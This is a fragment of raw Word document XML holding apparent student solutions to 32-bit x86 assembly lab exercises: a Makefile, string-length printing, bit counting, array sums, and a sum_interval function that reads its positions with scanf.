        </w:rPr>
        <w:t>=</w:t>
      </w:r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-Wall -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Wextra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-m32 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Iinclude</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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fno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-stack-protector -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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mpreferred</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-stack-boundary=2 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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fno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-PIC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608BF083" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00B373B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373B7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LDFLAGS</w:t>
      </w:r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B373B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="B6B1B1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r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-m32 -no-pie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7396BAC9" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00B373B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373B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# TODO: complete the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B373B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Makefile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B373B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to make the linking work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7888B21E" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00B373B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373B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all</w:t>
      </w:r>
      <w:r w:rsidRPr="00B373B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="B6B1B1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r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main.o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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file.o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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test.o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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directory.o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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op.o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F2627E7" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00B373B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$(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B373B7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CC</w:t>
      </w:r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 $(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B373B7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CFLAGS</w:t>
      </w:r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) </w:t>
      </w:r>
      <w:r w:rsidRPr="00B373B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FE4450"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>$^</w:t>
      </w:r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-o main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D59E42" w14:textId="77777777" w:rsidR="00E73B75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F2545E8" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00B373B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3F7BFC1" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00B373B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B373B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op.o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B373B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="B6B1B1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r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src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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op.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32842D39" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00B373B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>    $(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B373B7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CC</w:t>
      </w:r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 $(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B373B7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CFLAGS</w:t>
      </w:r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) -c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B373B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op.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="13C7C2F2" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00B373B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18E6C38" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75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7FDA83EB" w14:textId="74528607" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000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b,c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: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="004B6CF9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=Ja8bliKfM10&amp;t=9173s</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58FE1D8E" w14:textId="6A9673FD" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr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</w:rPr>
        <w:t>MODEL 2021-2022 v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4BFA1A" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:r w:rsidRPr="00AF5032">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00F73FF5" wp14:editId="7C263154">
            <wp:extent cx="5943600" cy="1361440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="564111264" name="Imagine 1" descr="O imagine care conține text, Font, captură de ecran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11264" name="Imagine 1" descr="O imagine care conține text, Font, captură de ecran&#10;&#10;Descriere generată automa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6E25" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:r>
        <w:t>a.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7C4BD9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extern </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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strlen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2D768578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extern </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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36EB2AEE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6DABA3C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section .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF503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rodata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40277E77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test_str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db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"hell, it's about time", </w:t>
      </w:r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462B8002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format </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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db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"length = %d", </w:t>
      </w:r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10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0DDAB255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9F8260C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section .text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD8528E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global main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E3F445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C1EB703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main:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315FAD8E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3E91F4A8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0063A33B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979CBE1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test_str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="208F281F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strlen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F02E3A7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</w:p>
    <w:p w14:paraId="1CE44351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BF73AC0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5695C269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format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A501288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7CE3C3D1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8DC3604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4311127E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test_str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00FF39DA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len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A5B1E03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</w:p>
    <w:p w14:paraId="749B2D4F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0261B4D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50F20627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format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE2F450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70C389BC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1887E810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0DE5D8B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5DB76C05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60B7E371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099D47E9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1DC71A9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AF503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len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF503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31014D31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19FB20C0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52243852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2918212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3337D60A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byte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001B0DE3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end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F05F2F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8805DE0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5F9E2D65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52405F6C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len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A998303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</w:p>
    <w:p w14:paraId="3E43B639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46B28205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4932E770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40E58390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FF4F6EA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end:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B1536A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AF503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34D9CC45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227E46D7" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00AF503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F503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F503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61705C6D" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75"/>
    <w:p w14:paraId="2E96B5E3" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:r w:rsidRPr="004B00BB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F91AC6D" wp14:editId="603F5E65">
            <wp:extent cx="5943600" cy="1814195"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="477174561" name="Imagine 1" descr="O imagine care conține text, captură de ecran, Font, număr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74561" name="Imagine 1" descr="O imagine care conține text, captură de ecran, Font, număr&#10;&#10;Descriere generată automa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9BB5" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75"/>
    <w:p w14:paraId="527E4B37" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:r>
        <w:t>a.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52185C5D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B9C3E65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54EF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TODO a: Print if sign bit is present or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04125DAB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[val1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA02CB5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shr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31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDFEF73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and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7FF1E47E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7DD7AE2E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jne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not_present</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="56421704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079DB7B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PRINTF32 `sign bit\n\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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE5CE29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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1422B185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54EF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not_present</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00354EF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1200FEC1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PRINTF32 `no sign bit\n\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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B39F7DF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continue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E703FA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E9038C0" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:r>
        <w:t>b.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDE2105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</w:t>
      </w:r>
      <w:r w:rsidRPr="00354EF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TODO b: Prin number of bits for integer value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA5C602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354EF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nr bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAA2B0B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[val1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A42298C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54EF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loop_bits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00354EF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5740D712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6D87A713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end_bits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0821866E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92EEDA0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685EC76C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and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17157233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2CCABA96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is_bit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7864DED6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0C5A97C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4A03C9B2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shr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0E5D8EBA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loop_bits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36393FFA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54EF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is_bit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00354EF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4D581B75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482235D7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637846E1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shr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18441469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loop_bits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="06CFBE7D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ACB79AE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54EF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end_bits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00354EF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1B07F1DD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PRINTF32 `%u\n\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`,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1AD66342" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:r>
        <w:t>c.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAAA8C1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</w:t>
      </w:r>
      <w:r w:rsidRPr="00354EF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TODO c: Prin number of bits for array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0718BC6C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354EF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nr total de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00354EF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biti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B013993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354EF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354EF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contor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00354EF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vector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590A9B09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6EA91EC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54EF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lastRenderedPageBreak/>
        <w:t>print_nr_bits_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00354EF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6FECC28E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354EF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nr bits </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00354EF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temporar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="68F0A7C9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len1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7361C0EE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end_nr_bits_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08334E6B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3541E56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movzx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byte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[arr1 + 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3D1C9D50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54EF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loop_bits_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00354EF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0DCBD843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60343FC8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end_bits_one_elem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F7FB366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1121E6D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5F263BA6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and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58CB397A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0768E5ED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is_bit_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E495816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EC53D87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2FD62F59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shr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46E331DD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loop_bits_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14FCBE89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54EF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is_bit_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00354EF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3F2639AE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387F8C9F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10428363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shr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62B71559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loop_bits_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24BAF3DD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54EF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end_bits_one_elem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00354EF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332A3AC8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354EF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354EF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crestem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00354EF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nr total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761DC7CB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6F86BF56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54EF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print_nr_bits_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F674B8B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54EF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end_nr_bits_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00354EF7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58C9CC5E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0B206D1" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00354EF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PRINTF32 `%u\n\</w:t>
      </w:r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  <w:r w:rsidRPr="00354EF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`, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00354EF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58BC6381" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75"/>
    <w:p w14:paraId="4E423510" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:r w:rsidRPr="00F85922">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7071676D" wp14:editId="4999AC3B">
            <wp:extent cx="5943600" cy="1717675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1583236228" name="Imagine 1" descr="O imagine care conține text, captură de ecran, Font, număr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36228" name="Imagine 1" descr="O imagine care conține text, captură de ecran, Font, număr&#10;&#10;Descriere generată automa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818D" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:r>
        <w:t>a.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1148D6CB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sum:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3264D1AF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F8592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60CCF94B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F8592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3284A077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50CD67D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F8592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TODO b: Implement sum() to compute sum for array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788D4A68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F8592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5F6C5F2E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F8592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5B8C5B06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F8592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328CE3ED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210C068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F8592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F8592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F8592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arr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="37B2304C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F8592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12</w:t>
      </w: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F8592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F8592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len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="49F39745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F8592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20FF0CBB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F8592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73983387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F8592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loop_sum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F8592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30FDBAD4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F8592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10F5295D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F8592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end_loop_sum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2840A02A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24D3AC2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F8592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77D3F399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9352D98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F8592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2822E12F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F8592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loop_sum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D258E0E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F8592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end_loop_sum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F8592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04C7A1F4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99CD292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F8592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10472F71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F8592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15F3B408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F8592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F8592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414E504D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F8592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746B790E" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00F8592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8592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F8592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5A0FFB2E" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:r>
        <w:t>b.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3223FF89" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:r>
        <w:t>APELARE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0EECDC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</w:t>
      </w:r>
      <w:r w:rsidRPr="0009365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b: Call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0009365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sum_interval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0009365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() and print result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A16F58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 </w:t>
      </w:r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</w:p>
    <w:p w14:paraId="61393804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 </w:t>
      </w:r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6B26E25E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arr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4DC72616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sum_interval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C0CF03B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12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47690A42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3BB6583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67321CC4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</w:p>
    <w:p w14:paraId="088684AA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2B9C3218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sum_interval_str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="223A8F5F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3B9B0262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44B73F65" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:r>
        <w:t>FUNCTIE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4507DEB5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09365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lastRenderedPageBreak/>
        <w:t>sum_interval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0009365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59F79780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0A7BE9DD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4EC76706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2C843AB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67D8E5F0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06FA1AD5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43E40D68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b: Implement </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0009365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sum_interval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0009365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() to compute sum for array between two positions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE3392F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09365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09365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arr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E1570DB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12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09365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start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67973E8C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16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09365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end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30477B85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15A5E0E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42D71687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09365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loop_sum_interval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0009365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508811E8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0F23DB75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jge</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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end_loop_sum_interval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6DA6D9BD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4FC1761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4619B77C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3A0E251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2E172833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loop_sum_interval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="496E0026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09365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end_loop_sum_interval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0009365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1C08808F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0D389DC2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5008CA9B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9365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7C517FCF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5DA130CB" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="0009365B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9365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9365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0BD9BAAF" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:r>
        <w:t>c.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADB845F" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="262335"/>
        <w:spacing w:line="240" w:lineRule="auto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E6BD7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section .data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1271FE37" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00AE6BD7" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="262335"/>
        <w:spacing w:line="240" w:lineRule="auto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pos1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE6BD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dd</w:t>
      </w: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AE6BD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3A324552" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00AE6BD7" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="262335"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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pos2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE6BD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dd</w:t>
      </w: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AE6BD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359A1D40" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75"/>
    <w:p w14:paraId="7460FE82" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00AE6BD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E6BD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c: Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE6BD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scanf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE6BD7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() to read positions from standard input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4810AE66" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00AE6BD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E6BD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pos1_str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FF4B8E" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00AE6BD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E6BD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570271E2" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00AE6BD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E6BD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E6BD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AE6BD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</w:p>
    <w:p w14:paraId="13D7C924" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00AE6BD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84C1BFB" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00AE6BD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E6BD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pos1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADA44F8" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00AE6BD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E6BD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uint_format</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2294E7AA" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00AE6BD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E6BD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scanf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:p>
    <w:p w14:paraId="45882B1E" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00AE6BD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E6BD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E6BD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AE6BD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13EAE6E2" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00AE6BD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5A81C6E" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00AE6BD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AE6BD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pos2_str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5787DF" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00AE6BD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E6BD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72043CAB" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00AE6BD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E6BD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E6BD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AE6BD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</w:p>
    <w:p w14:paraId="279850FA" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00AE6BD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9674D2E" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00AE6BD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E6BD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pos2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B08A6B1" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00AE6BD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E6BD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uint_format</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05EFAAFF" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00AE6BD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E6BD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scanf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:p>
    <w:p w14:paraId="567FB22E" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00AE6BD7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AE6BD7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AE6BD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AE6BD7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AE6BD7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7BE37BBA" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="0056338F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10E99C9" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="0056338F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6338F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56338F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[pos2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082EA0BF" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="0056338F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6338F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56338F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[pos1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD96200" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="0056338F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6338F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arr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5191970E" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="0056338F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6338F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sum_interval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="595CD411" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="0056338F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6338F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56338F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56338F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12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5940842A" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="0056338F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B1B1FFE" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="0056338F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6338F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56338F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7AA719DA" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="0056338F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6338F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56338F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[pos2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7797C471" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="0056338F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6338F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56338F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[pos1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145813D2" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="0056338F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6338F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sum_interval_str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
